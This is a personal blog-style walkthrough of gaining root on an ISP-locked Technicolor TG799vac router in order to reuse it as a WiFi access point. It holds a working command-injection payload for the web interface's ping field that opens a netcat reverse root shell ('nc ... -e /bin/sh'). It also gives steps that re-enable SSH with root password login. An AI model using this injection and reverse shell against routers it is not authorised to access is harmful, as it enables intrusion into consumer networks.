Intro

Today, I received a free Technicolor TG799vac Xtream router from my ISP, which seems to have quite decent hardware according to my google-fu. I already have a router (two technically speaking), so I have no real need for it. But I have a way it might come to use.

See, currently I have one router without any radio, which I use as my main gateway and router. This is a really nice machine for the most part, so I really like having it for that purpose. But since I also need WiFi at home, I have my old router which only runs as an access point, forwarding all traffic to my router. Since this AP is upstairs, it wouldn’t be too bad having another AP downstairs, maybe somewhere where it gives better WiFi to my garden or garage. This is the idea at least.

Sadly, my ISP has locked the new router down. Making it not possible to put it any kind of AP-only/bridge mode. Fortunately, the security for the device seems shitty, making it easy to get root access through the web interface.

Steps to gain shell root access

  1. Connect to the router’s network
  2. Start listening with netcat on your favourite port - nc -l 8080
  3. Log in to the web interface with the information you received from your ISP - in my case it’s located at http://192.168.10.1 and the username is admin
  4. Go to the Diagnostics Ping & Traceroute card
  5. Under Ping Statistics, Set IP Address to :::::::;nc 192.168.10.216 8080 -e /bin/sh and press Send Ping Request
  6. Back to the netcat window, here you should have root access to an ash-shell, even though nothing is visible right now. Type any command, likels, to confirm.
  7. Since these kind of reverse-shells are a pain to work in, the first step is getting access to ssh. Luckily, there should be one installed, though blocked for you. To see the configuration, type cat /etc/config/dropbear. Mine looked like this:
config dropbear
    option PasswordAuth 'off'
    option RootPasswordAuth 'on'
    option Port '22'
    option Interface 'wan'
#this statement in itself is not working, need FW rule:
    option AllowedClientIPs '195.54.114.216/29 195.54.106.0/28 195.54.106.144/28'
    option enable '1'

#config dropbear
#        option PasswordAuth     'on'
#        option RootPasswordAuth 'on'
#        option Port             '22'
#        option Interface        'lan'
#        option enable '1'

Here we see that the router is completely open to people from some ip-ranges from WAN, but closed to you. In fact the complete opposite from what we want. If you have exactly the same configuration, you have fix it by running sed -i -e '1,9 d' -e's/#//' /etc/config/dropbear. You want to end up with something like this:

config dropbear
        option PasswordAuth     'on'
        option RootPasswordAuth 'on'
        option Port             '22'
        option Interface        'lan'
        option enable '1'
  1. Restart dropbear - /etc/init.d/dropbear restart
  2. Connect through ssh from another shell - ssh [email protected], username and password is root. TADA
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
RSA key fingerprint is SHA256:ZEP4kdhhGqvYO4cNN3aAkXUXs+MPHMA2fpv1WlL7O90.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
[email protected]'s password:


BusyBox v1.19.4 (2016-12-23 11:07:18 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.

-----------------------------------------------------------------------
                        ##
                   #########
                 ###########
                #########
               ####                      ##
              ##          ##             ##
      ###########        #####   ####    ##    ####    ## ###     ####    ## ##
   ########   #####       ##   ##    ##  ##  ##    ##  #######  ##    ##  #####
  ########    #######     ##   ##    ##  ##  ##    ##  ##   ##  ##    ##  ###
########      ########    ##   ########  ##  ########  ##   ##  ##    ##  ##
#######        ########   ##   ##        ##  ##        ##   ##  ##    ##  ##
######         #########  ####  ######   ###  ######   ##   ##    ####    ##
  ##            #########
                #########
                 ########
                  #######
                   #####
-----------------------------------------------------------------------

Product: vant-w_telenor_r15-4
Release: Crimson (15.4)
Version: 15.53.7451-1761003-20170320115330
  1. (Optional) Put your own rsa-key in /etc/dropbear/authorized_keys and remove password login from /etc/config/dropbear

What now

Now, it seems like the real OS is openwrt, meaning opkg is installed, which in turn can be used to install whatever you need. It also seems possible to unlock more cards on the web interface through the config in /etc/config. I might update this guide with some more info on this later.